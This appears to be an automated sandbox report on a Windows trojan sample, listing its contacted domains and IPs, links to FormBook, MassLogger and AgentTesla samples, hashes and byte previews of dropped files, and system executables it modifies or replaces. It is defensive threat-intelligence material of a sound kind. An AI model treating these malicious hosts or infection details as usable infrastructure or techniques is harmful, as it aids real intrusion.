                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  54.244.188.177
                  		pywolwnvd.bizUnited States
                  		16509AMAZON-02USfalse

                  General Information

                  Joe Sandbox version:42.0.0 Malachite
                  Analysis ID:1588231
                  Start date and time:2025-01-10 22:55:04 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 7m 18s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:7
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:UaOJAOMxcU.exe
                  renamed because original name is a hash value
                  Original Sample Name:2a60ca525c89948993b31e2e086a88455e71363863cfc7f835a47c1b657ea4a5.exe
                  Detection:MAL
                  Classification:mal100.spre.troj.evad.winEXE@5/8@2/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 77%
                  • Number of executed functions: 74
                  • Number of non-executed functions: 245
                  Cookbook Comments:
                  • Found application associated with file extension: .exe

                  Warnings

                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Report size exceeded maximum capacity and may have missing disassembly code.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  16:55:56API Interceptor1x Sleep call for process: UaOJAOMxcU.exe modified
                  16:56:28API Interceptor3x Sleep call for process: svchost.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  54.244.188.177SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                  • cvgrf.biz/kmpia
                  I3LPkQh2an.exeGet hashmaliciousFormBookBrowse
                  • lrxdmhrr.biz/rwlfutjcp
                  OVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                  • pywolwnvd.biz/wlyolqts
                  RJKUWSGxej.exeGet hashmaliciousAgentTesla, RedLineBrowse
                  • lrxdmhrr.biz/tbbwyfgx
                  PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                  • lrxdmhrr.biz/fncvigkebkn
                  REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                  • cvgrf.biz/dy
                  HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                  • cvgrf.biz/ubwy
                  INV_NE_02_2034388.exeGet hashmaliciousFormBookBrowse
                  • cvgrf.biz/mddjrljmh
                  Shipment Notification.exeGet hashmaliciousFormBookBrowse
                  • cvgrf.biz/pm
                  HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                  • cvgrf.biz/yfypviummaqwyuq

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  ssbzmoy.bizSABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                  • 18.141.10.107
                  I3LPkQh2an.exeGet hashmaliciousFormBookBrowse
                  • 18.141.10.107
                  OVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                  • 18.141.10.107
                  RJKUWSGxej.exeGet hashmaliciousAgentTesla, RedLineBrowse
                  • 18.141.10.107
                  PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                  • 18.141.10.107
                  REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                  • 18.141.10.107
                  HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                  • 18.141.10.107
                  INV_NE_02_2034388.exeGet hashmaliciousFormBookBrowse
                  • 18.141.10.107
                  Shipment Notification.exeGet hashmaliciousFormBookBrowse
                  • 18.141.10.107
                  HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                  • 18.141.10.107
                  pywolwnvd.bizSABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                  • 54.244.188.177
                  I3LPkQh2an.exeGet hashmaliciousFormBookBrowse
                  • 54.244.188.177
                  OVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                  • 54.244.188.177
                  RJKUWSGxej.exeGet hashmaliciousAgentTesla, RedLineBrowse
                  • 54.244.188.177
                  PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                  • 54.244.188.177
                  REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                  • 54.244.188.177
                  HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                  • 54.244.188.177
                  INV_NE_02_2034388.exeGet hashmaliciousFormBookBrowse
                  • 54.244.188.177
                  Shipment Notification.exeGet hashmaliciousFormBookBrowse
                  • 54.244.188.177
                  HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                  • 54.244.188.177

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  AMAZON-02US0Wu31IhwGO.exeGet hashmaliciousFormBookBrowse
                  • 18.139.62.226
                  https://www.shinsengumiusa.com/mrloskieGet hashmaliciousUnknownBrowse
                  • 3.120.85.61
                  SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                  • 18.141.10.107
                  fFoOcuxK7M.exeGet hashmaliciousFormBookBrowse
                  • 13.248.169.48
                  NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                  • 18.139.62.226
                  I3LPkQh2an.exeGet hashmaliciousFormBookBrowse
                  • 18.141.10.107
                  statement.docGet hashmaliciousKnowBe4Browse
                  • 52.217.123.201
                  9MZZG92yMO.exeGet hashmaliciousFormBookBrowse
                  • 76.223.67.189
                  aBEh0fsi2c.exeGet hashmaliciousFormBookBrowse
                  • 13.248.169.48
                  EIvidclKOb.exeGet hashmaliciousFormBookBrowse
                  • 13.228.81.39

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

                  Download File
                  Process:C:\Users\user\Desktop\UaOJAOMxcU.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):1658880
                  Entropy (8bit):4.312985221034903
                  Encrypted:false
                  SSDEEP:24576:jxGBcmljVg9N9JMlDlfjRiVuVsWt5MJMs:tGy+RgFIDRRAubt5M
                  MD5:717063427E4960E26A9AEEA93FFA8BC8
                  SHA1:BD19BECB164ECEA8D90A5EF9755226A894EFF4B1
                  SHA-256:CA1F2725C7EAE6CE31EBCF905FC9F264B76E8093BEBD3827ED61900A7E435FB4
                  SHA-512:2A898ED7A3826B6947F228C68D6401C0EAFA6E9352B240290AF034FEE5BE80E541B8C97C404EE315584D03EEA50BC7C29A40D3B8976AB6BDD3B5441EAE7564BF
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@..................................i......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...............`..............@...........................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\aut8008.tmp

                  Download File
                  Process:C:\Users\user\Desktop\UaOJAOMxcU.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):288768
                  Entropy (8bit):7.994960411237261
                  Encrypted:true
                  SSDEEP:6144:p3H4EZg9lZ27hYiL2iAW1Ia3czJbCxG1CzCHid/W/FIphWQZmSjjPpo:pXb+rCYieW1IpzJGmCu+YO/WQZmSjVo
                  MD5:80CFECD52CB7E58C3B6F05C33B4D11B8
                  SHA1:C3F6BECD0F6B737A415EF7B5DC87FFD53D71BE55
                  SHA-256:E38AB7E46B69C8DDA3226EBF64275D1A32E9D62183D1ACDA2C5169572E1F86EF
                  SHA-512:A3A5B2446EC446223AFDB11C166AFCB15AE638486B65EE6341AEAA42A747BC66DC93D977C6009533222D54827B5936F16A6B804BDD1E11C4EF042E35A0B40A32
                  Malicious:false
                  Reputation:low
                  Preview:...T7SOA3G3Q..DT.J8BBVT4.OA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBV.4SOO(.=Q.K.u.Kt.c.<] o1E(T#-/d7;$V-6v6Qs=4YgZ?l...z'W&'xY9YkA7G3QLB=US.."%.iT4.|W .K..n:-.X....3(.-.p"#..#[*.63.SOA7G3QL..TZ.9CB....OA7G3QLB.TXK3CIVTbWOA7G3QLBDTOJ8BRVT4#KA7GsQLRDTZH8BDVT4SOA7A3QLBDTZJHFBVV4SOA7G1Q..DTJJ8RBVT4COA'G3QLBDDZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBj ?2LBBV.aWOA'G3Q.FDTJJ8BBVT4SOA7G3QlBD4ZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3Q

                  C:\Users\user\AppData\Local\Temp\aut8057.tmp

                  Download File
                  Process:C:\Users\user\Desktop\UaOJAOMxcU.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):14584
                  Entropy (8bit):7.636546073976075
                  Encrypted:false
                  SSDEEP:384:ITYznwreDrLYun6MkQ7db5lYRgvchXhsLp7NK6NYWp3isCLt:IAwaDrL4Qhp0YLpQZsCx
                  MD5:A107AF6FF42A43A2E5AF0A79FA2E7105
                  SHA1:8B696A4B687597CC2265E98863B81E3A8873BAD7
                  SHA-256:F983A3F5288BDCDDA51BE795022FEA62341079829667EBCADF9D53B4D9CF6FFB
                  SHA-512:F228C9236FDF5C92BABF897190E6F526BAC9AE446AD2443CC2FDE88E07A2144208E2269786EDD2BB675A65E1103DB7149990AD85EE23FB5EF71689B7331A2203
                  Malicious:false
                  Reputation:low
                  Preview:EA06..0..[.....+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

                  C:\Users\user\AppData\Local\Temp\nonagglutinant

                  Download File
                  Process:C:\Users\user\Desktop\UaOJAOMxcU.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:dropped
                  Size (bytes):143378
                  Entropy (8bit):2.9925060211517374
                  Encrypted:false
                  SSDEEP:96:AIXLr4w+F05BnOohpJ0FlenMA6ZnmLdGcu19I6yKup3PfrWVjjvqnBaAJZdjureP:H3bjeeDRGcu19I6yKup3nrWVHqnBaA
                  MD5:BC1E1F9966D435C3C894D80D25B16E76
                  SHA1:6060AA56E06283A17819958ACACA90E50F654167
                  SHA-256:BCFA229B340EB1F832B3C3073E6483AD0E25693402C0FC3885BF5889438CEA2A
                  SHA-512:0EE8A91C0D5F3B625293CCE5E3F46B8AC73EBAF3AFC8225A98161BAC3AAD39D694D7DAA2731D78B8DF09F6505274899737845531AAD75ACA2E5746FB9ACD3858
                  Malicious:false
                  Reputation:low
                  Preview:dowp0dowpxdowp5dowp5dowp8dowpbdowpedowpcdowp8dowp1dowpedowpcdowpcdowpcdowp0dowp2dowp0dowp0dowp0dowp0dowp5dowp6dowp5dowp7dowpbdowp8dowp6dowpbdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowp4dowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowp6dowpbdowpadowp7dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowp8dowpbdowp8dowp6dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowpadowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowpcdowpbdowpadowp6dowpcdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowpedowpbdowp8dowp3dowp3dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp9dowp0dowpbdowp9dowp3dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp9dowp2dowpbdowpadowp2dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp9dowp4dowpbdowp8dowp6dowp4dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9

                  C:\Users\user\AppData\Local\Temp\outbluffed

                  Download File
                  Process:C:\Users\user\Desktop\UaOJAOMxcU.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):288768
                  Entropy (8bit):7.994960411237261
                  Encrypted:true
                  SSDEEP:6144:p3H4EZg9lZ27hYiL2iAW1Ia3czJbCxG1CzCHid/W/FIphWQZmSjjPpo:pXb+rCYieW1IpzJGmCu+YO/WQZmSjVo
                  MD5:80CFECD52CB7E58C3B6F05C33B4D11B8
                  SHA1:C3F6BECD0F6B737A415EF7B5DC87FFD53D71BE55
                  SHA-256:E38AB7E46B69C8DDA3226EBF64275D1A32E9D62183D1ACDA2C5169572E1F86EF
                  SHA-512:A3A5B2446EC446223AFDB11C166AFCB15AE638486B65EE6341AEAA42A747BC66DC93D977C6009533222D54827B5936F16A6B804BDD1E11C4EF042E35A0B40A32
                  Malicious:false
                  Reputation:low
                  Preview:...T7SOA3G3Q..DT.J8BBVT4.OA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBV.4SOO(.=Q.K.u.Kt.c.<] o1E(T#-/d7;$V-6v6Qs=4YgZ?l...z'W&'xY9YkA7G3QLB=US.."%.iT4.|W .K..n:-.X....3(.-.p"#..#[*.63.SOA7G3QL..TZ.9CB....OA7G3QLB.TXK3CIVTbWOA7G3QLBDTOJ8BRVT4#KA7GsQLRDTZH8BDVT4SOA7A3QLBDTZJHFBVV4SOA7G1Q..DTJJ8RBVT4COA'G3QLBDDZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBj ?2LBBV.aWOA'G3Q.FDTJJ8BBVT4SOA7G3QlBD4ZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3Q

                  C:\Users\user\AppData\Roaming\68325cf9c814f3fc.bin

                  Download File
                  Process:C:\Users\user\Desktop\UaOJAOMxcU.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):12320
                  Entropy (8bit):7.98589608850139
                  Encrypted:false
                  SSDEEP:384:EywWjRZv6lbrA9UuonqpkIt8MENtf8WyCbl/:MjlbryonukIaMUtf7yCbB
                  MD5:1B156FCBFCD13D832439548B1B8F0FA6
                  SHA1:FABA56616E2FFAEE4E388988536F58CCBCB730AE
                  SHA-256:B93BEA2790C92EA481537CEDBE44CD4E2DBC95F429C6C4608430684F2D7A5C63
                  SHA-512:1F3BD2240DD318E3E6CCD36CDA14D4CF063D668B42C27BEE838297632D8B195CB315B743B09C1E1D5F84FE66B8B3E35D37B416F96B9BA504FE5566064FDA5CB7
                  Malicious:false
                  Reputation:low
                  Preview:....K.../E..a..to.....:..._C....6f#....A...{p7..2.x?"........'|.#V.K..j...4..N.s+..gh.P....S5O.Mj.4......'.kJ..1.e.*p..2........M...4...D..^{G~.. ....4X6..1..<~..(......3.....kB.PL~...p.?..\r..o..T|..V.E..7(.G..M.f..U..6.$u9.hp*..VA......F.nz.~......\..[.*t.<...J.......9...=/x.....&h...Q..._H....I....'q{t...B.#Yv....*dv...<.D).~.2..d.9~@......e..e.~.X.W..|.......y.=.R...F.*.~z.....b...u.i=......;...Y`".ys....b...p$...6.6........fUW....../.*..Y.$SCo4..|i.hw.~A@0..........nO..T...d..`k.fu*.4...K.o.8..*..R..V.}....cs...p.9.c.J>.n)...@....I..w.%o....oo..c...M.P.Gj....g...A_+.g.eZ..j.}{.....S.YQ...(..F~.Ak...l..y.j.r.^..n...I...7....G.f.=.8...p...'z-.w.0......7....e?\......./).8.v5.}...>.......{s.a~....l..|c......|....k ~.2.s&.nnjB....NZc..........qe...AWY..D..r...{.4f[/...W.r. M...A.n..ZpP....q8wh&.D..Z.nmY,:.SV......e.X.t....[........M.........6...h.....O..p.qqN....T}z.......J..G.Y.M.......a..!....l.JG._..k...O.)....{.B$!..D..9W..,}..

                  C:\Windows\System32\AppVClient.exe

                  Download File
                  Process:C:\Users\user\Desktop\UaOJAOMxcU.exe
                  File Type:PE32+ executable (console) x86-64, for MS Windows
                  Category:modified
                  Size (bytes):1348608
                  Entropy (8bit):7.251556205859396
                  Encrypted:false
                  SSDEEP:24576:vQW4qoNUgslKNX0Ip0MgHCpoMBOuyVg9N9JMlDlfjRiVuVsWt5MJMs:vQW9BKNX0IPgiKMBOuegFIDRRAubt5M
                  MD5:370B058471F7AFC632A937213C7FEAA6
                  SHA1:06A427976DFA93879005B7AEDC44EC50EA681300
                  SHA-256:A06047FD818014781CB086AD2E9B9795973AB5131DB0EAC69073C3A731CD4AF7
                  SHA-512:D17B276BD6B49BED5E6DD55728DFF754AA9A06F6066682DDF96FCB14FE18481750EDE7C1D60F2BA9B53D7ED93E213BB071307DB8799F389DA90C30BCF5FEC732
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@.......................................... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

                  C:\Windows\System32\alg.exe

                  Download File
                  Process:C:\Users\user\Desktop\UaOJAOMxcU.exe
                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):1594368
                  Entropy (8bit):4.17566981094846
                  Encrypted:false
                  SSDEEP:12288:qEP3RFsV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:JFQVg9N9JMlDlfjRiVuVsWt5MJMs
                  MD5:791FE83149B027ED288BF7B3D73209AA
                  SHA1:F0A9C762DD261D68EA34D41860234C1813D3AC8B
                  SHA-256:6537B5BCB1D841674B9374D1AD851EB92514B1EF7469F63D1AB5D2BDAD27EEF9
                  SHA-512:FA0002879C46C324666117FBF0A55C44572B754AFF9B7E4C87EEA8248E6FEB77943274B81FAA202A1B7F51A482B86679FC5800FE7D482AC498C7861148735DCA
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@....................................G-.... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...............t..............@...................................................................................................................................................................................................................................

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.512066633795974
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:UaOJAOMxcU.exe
                  File size:1'777'664 bytes
                  MD5:97a3cc0911d35ed963283afb08b1e671
                  SHA1:129e91e7dbf157743c1ddcc332f3880e99427115
                  SHA256:2a60ca525c89948993b31e2e086a88455e71363863cfc7f835a47c1b657ea4a5
                  SHA512:f989ef525b9320f1ebd77a5e8fe0d1248df53030eac4b4f2b3563e2ea80bfd6a54601443674f6580b6b5f76c4f54af1d69f00522ce177e1e180c8805b3770952
                  SSDEEP:49152:md0c++OCvkGs9FahLyOsW++0YxgFIDRRAubt5M:yB3vkJ9yj++0rUf
                  TLSH:E885E02273DDC360CB669173FF6A77056FBB3C610630B85B2F980D79A950162162DBA3
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                  File Icon

                  Icon Hash:aaf3e3e3938382a0

                  Static PE Info

                  General

                  Entrypoint:0x427dcd
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  DLL Characteristics:TERMINAL_SERVER_AWARE
                  Time Stamp:0x6757B1EA [Tue Dec 10 03:13:46 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:afcdf79be1557326c854b6e20cb900a7

                  Entrypoint Preview

                  Instruction
                  call 00007F5038DF4B1Ah
                  jmp 00007F5038DE78E4h
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  push edi
                  push esi
                  mov esi, dword ptr [esp+10h]
                  mov ecx, dword ptr [esp+14h]
                  mov edi, dword ptr [esp+0Ch]
                  mov eax, ecx
                  mov edx, ecx
                  add eax, esi
                  cmp edi, esi
                  jbe 00007F5038DE7A6Ah
                  cmp edi, eax
                  jc 00007F5038DE7DCEh
                  bt dword ptr [004C31FCh], 01h
                  jnc 00007F5038DE7A69h
                  rep movsb
                  jmp 00007F5038DE7D7Ch
                  cmp ecx, 00000080h
                  jc 00007F5038DE7C34h
                  mov eax, edi
                  xor eax, esi
                  test eax, 0000000Fh
                  jne 00007F5038DE7A70h
                  bt dword ptr [004BE324h], 01h
                  jc 00007F5038DE7F40h
                  bt dword ptr [004C31FCh], 00000000h
                  jnc 00007F5038DE7C0Dh
                  test edi, 00000003h
                  jne 00007F5038DE7C1Eh
                  test esi, 00000003h
                  jne 00007F5038DE7BFDh
                  bt edi, 02h
                  jnc 00007F5038DE7A6Fh
                  mov eax, dword ptr [esi]
                  sub ecx, 04h
                  lea esi, dword ptr [esi+04h]
                  mov dword ptr [edi], eax
                  lea edi, dword ptr [edi+04h]
                  bt edi, 03h
                  jnc 00007F5038DE7A73h
                  movq xmm1, qword ptr [esi]
                  sub ecx, 08h
                  lea esi, dword ptr [esi+08h]
                  movq qword ptr [edi], xmm1
                  lea edi, dword ptr [edi+08h]
                  test esi, 00000007h
                  je 00007F5038DE7AC5h
                  bt esi, 03h
                  jnc 00007F5038DE7B18h

                  Rich Headers

                  Programming Language:
                  • [ASM] VS2013 build 21005
                  • [ C ] VS2013 build 21005
                  • [C++] VS2013 build 21005
                  • [ C ] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
                  • [ASM] VS2013 UPD4 build 31101
                  • [RES] VS2013 build 21005
                  • [LNK] VS2013 UPD4 build 31101

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x5b954.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x8dcc40x8de00af54ec0cc55e230eff297c736f22101cFalse0.5728679102422908data6.676131910996061IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
